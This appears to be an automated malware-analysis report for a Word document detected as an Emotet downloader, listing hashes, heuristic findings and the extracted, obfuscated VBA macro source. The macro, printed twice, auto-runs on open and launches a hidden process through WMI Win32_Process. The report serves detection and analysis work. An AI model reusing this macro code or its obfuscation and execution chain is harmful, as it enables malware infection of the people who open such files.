Office (OLE) malware analysis — malicious · 0601a07c6c366ba5

MALICIOUS

Office (OLE)

102.9 KB Created: 2019-05-07 10:12:00 Authoring application: Microsoft Office Word First seen: 2021-01-23

MD5: 6fcb0861ce38fdaa75f76e01870c547a SHA-1: 223261fe8b9dc61191b2be6cac87ab5c5d9e8893 SHA-256: 0601a07c6c366ba5bb64c7c9eb7b699fbed121e8fb46ba45f27fbbd0626ad9d4

210 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6964647-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6964647-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
Set G5633975 = D14061(GetObject("winmgmt" _
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set G5633975 = D14061(GetObject("winmgmt" _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
autoopen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5093 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5093 bytes
SHA-256: `c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b1720618" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "w1578953" Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "E22014" Attribute VB_Name = "D8773492" Attribute VB_Name = "A580701" Attribute VB_Name = "o_8234" Attribute VB_Name = "A27379" Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "T_4460" Function D14061(W7471584) While b844381_ And s0130958 'Y569_00E62_464c800410G802_90 Wend While a05_90 And m9_446_1 'w59_966M01__83_J_60987Z6044669 Wend While w3_85_ And j230273 'F4502230W4881749G615384Y59272_ Wend Set D14061 = CVar(W7471584) While n7700522 And H668505 'T57_8915X808160h067184A77_80 Wend While B36304 And M608_92 'q0_54_o4056579X2099243i04190 Wend End Function Sub _ autoopen() On Error Resume Next While f42799 And L7704099 'w254697c01847_k4823_08l424_2 Wend While z0679462 And S458956 'h02504_p213892m4346364k50024 Wend While K680621_ And U_7399 'Q39211L0620631H761671A5188101 Wend Call U2939849 While V24_38 And l_53838 'V27225L92014_N04__279w485_0 Wend While w29_804 And Z0320_2 'z43877Y1834991U4645895w82878 Wend While l43461 And j874849 'B199761w3__27D2__8649f5179_75 Wend End Sub Attribute VB_Name = "Y0498310" Function U2939849() On Error Resume Next While B31857 And Z36_1091 'P32532q598634a466103S71186 Wend While R13623_1 And A371943 'l2___683K335660v7758237v98698 Wend While I61794 And c42461 'V630213j492_92i_000740b4119_ Wend p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText While l_0568 And R44923_ 'a64_551j18718A049625F431446 Wend While Z8631279 And t1259084 'B25_5323j__2521c20510d708298 Wend While c_61158 And f906094 'r06871z776893u_72221K8_948 Wend Set G5633975 = D14061(GetObject("winmgmt" _ + "s:Wi" + "n3" _ + "2_Pr" _ + "ocess")) While D326073 And L24085 'K143790Q6256_29C83_624j55_227 Wend While M09705 And d801881_ 'U__9248_h149_27Y23820X74_678 Wend G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779 While X3_067_ And j9_5696 'b16603M59_7932j_09630O78902_4 Wend While T61109_1 And d02334 'X99512_W56_2_Y830942b98324 Wend While p65608 And j_36__78 'o0_0971d446_507r6461317z62707 Wend End Function Attribute VB_Name = "T9365707" Public Function T54591() While F76090 And w044579 'w43028D86__94S14822L6109_52 Wend While I41891 And E880_46 'R342908J9159_49V7_2266j2__029 Wend While B44_493 And V770134_ 's06956_4Z58414__v480_19_h126886 Wend Set T54591 = D14061(GetObject("winmgmt" _ + "s:Wi" + "n3" + "2_Pr" _ + "ocess" + "S" + "tartup")) While X913926 And T11742 'M3078876F34_055Q08158r79_70 Wend While G94793 And o9582444 'c5651770f_5479k8906914p3_14807 Wend While N1721770 And w13454 'M205058E1_71870M54431_1P3773381 Wend w6638_21 = vbError - vbError While s364__04 And d963075 'w661553_o_0213W3086_16o00785 Wend While k5942525 And q3414672 'r446562K8_4910B4254219C_982415 Wend With T54591 While u_1484 And c0_42505 'J79709i9442864q29524X1__7972 Wend While Q38089 And P80132 'I586617o4851_G430_3N650930 Wend While z2_8__88 And t575005 'R31_68Z05444q18_71F166953 Wend . _ ShowWindow = w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 While v70865_9 And E2274_ 'W32186o_04193j427380m785359 Wend While p73133 And M5_85_9_ 'r440498q17243S3855771Z07_6430 Wend End With While X72205 And U81453 'H41_917h123359w5403433u149744 Wend While B131305 And T035_41 'W9752_96w4488_z1152769u5626339 Wend End Function

SHA-256: c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b1720618"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "w1578953"
Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E22014"

Attribute VB_Name = "D8773492"

Attribute VB_Name = "A580701"

Attribute VB_Name = "o_8234"

Attribute VB_Name = "A27379"
Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_4460"
Function D14061(W7471584)
         While b844381_ And s0130958
'Y569_00E62_464c800410G802_90
      Wend
         While a05_90 And m9_446_1
'w59_966M01__83_J_60987Z6044669
      Wend
         While w3_85_ And j230273
'F4502230W4881749G615384Y59272_
      Wend
Set D14061 = CVar(W7471584)
         While n7700522 And H668505
'T57_8915X808160h067184A77_80
      Wend
         While B36304 And M608_92
'q0_54_o4056579X2099243i04190
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While f42799 And L7704099
'w254697c01847_k4823_08l424_2
      Wend
         While z0679462 And S458956
'h02504_p213892m4346364k50024
      Wend
         While K680621_ And U_7399
'Q39211L0620631H761671A5188101
      Wend
Call U2939849
         While V24_38 And l_53838
'V27225L92014_N04__279w485_0
      Wend
         While w29_804 And Z0320_2
'z43877Y1834991U4645895w82878
      Wend
         While l43461 And j874849
'B199761w3__27D2__8649f5179_75
      Wend
End Sub


Attribute VB_Name = "Y0498310"
Function U2939849()
On Error Resume Next
         While B31857 And Z36_1091
'P32532q598634a466103S71186
      Wend
         While R13623_1 And A371943
'l2___683K335660v7758237v98698
      Wend
         While I61794 And c42461
'V630213j492_92i_000740b4119_
      Wend
p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText
         While l_0568 And R44923_
'a64_551j18718A049625F431446
      Wend
         While Z8631279 And t1259084
'B25_5323j__2521c20510d708298
      Wend
         While c_61158 And f906094
'r06871z776893u_72221K8_948
      Wend
Set G5633975 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
         While D326073 And L24085
'K143790Q6256_29C83_624j55_227
      Wend
         While M09705 And d801881_
'U__9248_h149_27Y23820X74_678
      Wend
G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779
         While X3_067_ And j9_5696
'b16603M59_7932j_09630O78902_4
      Wend
         While T61109_1 And d02334
'X99512_W56_2_Y830942b98324
      Wend
         While p65608 And j_36__78
'o0_0971d446_507r6461317z62707
      Wend
End Function


Attribute VB_Name = "T9365707"

Public Function T54591()
         While F76090 And w044579
'w43028D86__94S14822L6109_52
      Wend
         While I41891 And E880_46
'R342908J9159_49V7_2266j2__029
      Wend
         While B44_493 And V770134_
's06956_4Z58414__v480_19_h126886
      Wend
Set T54591 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" + "2_Pr" _
+ "ocess" + "S" + "tartup"))
         While X913926 And T11742
'M3078876F34_055Q08158r79_70
      Wend
         While G94793 And o9582444
'c5651770f_5479k8906914p3_14807
      Wend
         While N1721770 And w13454
'M205058E1_71870M54431_1P3773381
      Wend
w6638_21 = vbError - vbError
         While s364__04 And d963075
'w661553_o_0213W3086_16o00785
      Wend
         While k5942525 And q3414672
'r446562K8_4910B4254219C_982415
      Wend
With T54591
         While u_1484 And c0_42505
'J79709i9442864q29524X1__7972
      Wend
         While Q38089 And P80132
'I586617o4851_G430_3N650930
      Wend
         While z2_8__88 And t575005
'R31_68Z05444q18_71F166953
      Wend
. _
ShowWindow = w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21 + w6638_21
         While v70865_9 And E2274_
'W32186o_04193j427380m785359
      Wend
         While p73133 And M5_85_9_
'r440498q17243S3855771Z07_6430
      Wend
End With
         While X72205 And U81453
'H41_917h123359w5403433u149744
      Wend
         While B131305 And T035_41
'W9752_96w4488_z1152769u5626339
      Wend
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.